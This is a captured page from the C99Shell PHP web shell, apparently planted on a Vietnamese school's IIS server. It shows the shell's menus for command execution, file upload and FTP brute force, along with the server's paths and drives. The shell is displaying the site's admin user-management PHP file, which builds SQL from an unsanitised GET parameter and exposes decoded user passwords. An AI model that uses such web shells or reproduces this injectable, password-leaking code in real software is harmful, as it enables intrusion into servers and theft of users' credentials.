!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

E:\thcsltv.edu.vn\httpdocs\admin\modules\mod_user\   drwxrwxrwx
Free 224.42 GB of 400 GB (56.11%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     user.php (1.54 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
   defined
('_JEXEC') or die;
   
$ap = new app;    $ap->get_('data');   $db = new data
   echo 
'<div class="head">QUẢN LÝ NGƯỜI DÙNG HỆ THỐNG</div>'
   
$sql "SELECT * FROM $db->db_".$_GET['module']." LIMIT 0, 30 ";
   
$result mysql_query($sql$db->conn); 
   echo 
'<Table border="3" cellspacing="3" align="center"><th colspan="2" width=50 height = 30><a href="index.php?module='.$_GET['module'].'&amp;task=register"><img src="'.$db->local.'images/new.png" width=50 height=40 title="Add user"/></a></th><th width=30>TT</th><th width=30>ID</th><th width=150>Họ và tên</th>';
   echo 
'<th width=150>Tên đăng nhập</th><th width=250>Mật khẩu</th><th width=100>Quyền user</th><th width=80>Khóa</th><th width=250>Địa chỉ email</th>';
   
$i 0; while($r mysql_fetch_array($result)) { $i++;
      echo 
'<tr><td><a href="index.php?module='.$_GET['module'].'&amp;task=update&amp;id='.$r[id].'&amp;name='.$r[name].'&amp;username='.$r[username].'&amp;password='.$ap->de_code($r[password]).'&amp;usertype='.$r[usertype].'&amp;block='.$r[block].'&amp;email='.$r[email].'"><img src="'.$db->local.'images/b_edit.png" title="Sửa"/></a></td>';
      echo 
'<td><a href="index.php?module='.$_GET['module'].'&amp;task=delete&amp;id='.$r[id].'"><img src="'.$obj->local.'images/b_drop.png" title="Xóa" /></a></td>'; echo '<td>'.$i.'</td>';
      echo 
'<td>'.$r[id].'</td><td>'.$r[name].'</td><td>'.$r[username].'</td><td>'.$r[password].'</td><td>'.$r[usertype].'</td><td>'.$r[block].'</td><td>'.$r[email].'</td></tr>';
    } echo 
'</Table>';
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.7333 ]--